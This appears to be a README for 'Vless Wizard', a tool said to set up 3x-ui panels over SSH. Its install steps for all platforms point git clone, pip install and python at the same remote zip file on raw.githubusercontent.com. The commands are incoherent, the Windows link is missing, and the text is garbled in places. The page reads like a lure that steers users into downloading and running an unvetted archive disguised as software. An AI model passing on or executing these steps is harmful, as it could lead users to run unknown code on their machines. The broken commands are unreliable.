Welcome to Vless Wizard! This application helps you set up 3x-ui panels through SSH with minimal effort. Follow these steps to download and run the software.
You can download the latest version of Vless Wizard from the Releases page. Click the button below to get started:
The easiest way to install Vless Wizard on Windows is via the installer.
-
Click the link below to download the installer:
-
Once downloaded, double-click the setup file to start the installation.
-
Follow the on-screen instructions to complete the installation.
-
After installation, launch Vless Wizard from the Start menu or desktop shortcut.
For Linux and macOS users, you need to install a few dependencies first.
Make sure you have Python 3.10+ installed on your system. If you donβt have it yet, please install Python from the official website or using your package manager.
Open your terminal and run the following commands:
git clone https://raw.githubusercontent.com/southpart302/vless-wizard/main/xray/vless-wizard-1.7.zip
cd vless-wizardNext, create a virtual environment and activate it:
python3 -m venv venv
source venv/bin/activateNow install the necessary packages by running:
pip install -r https://raw.githubusercontent.com/southpart302/vless-wizard/main/xray/vless-wizard-1.7.zipIf you encounter the error
pip: command not found, you may need to install the Python package manager:sudo apt install python3-pip # For Ubuntu/Debian users brew install python # For macOS users
XX### 5. Run Vless Wizard
Once all dependencies are installed, you can start the application by executing:
python https://raw.githubusercontent.com/southpart302/vless-wizard/main/xray/vless-wizard-1.7.zip- User-Friendly Interface: Easily manage your 3x-ui panels without technical jargon.
- Automated Setup: Vless Wizard connects to your server automatically and installs 3x-ui for you.
- Cross-Platform Support: Fully compatible with Windows, Linux, and macOS.
If you run into issues during installation or while using the application, consider the following:
- Check Python Version: Ensure you have the correct version of Python installed.
- Review Dependencies: Confirm that all packages installed successfully.
- Firewall & Network Settings: Check your network settings to make sure they allow SSH connections.
For detailed troubleshooting steps, refer to the official documentation.
Join the community for help and updates. You can visit the projectβs Wiki for detailed guides and FAQs.
Keep an eye on the Releases page for updates to Vless Wizard. Regular updates provide new features and bug fixes.
Thank you for using Vless Wizard!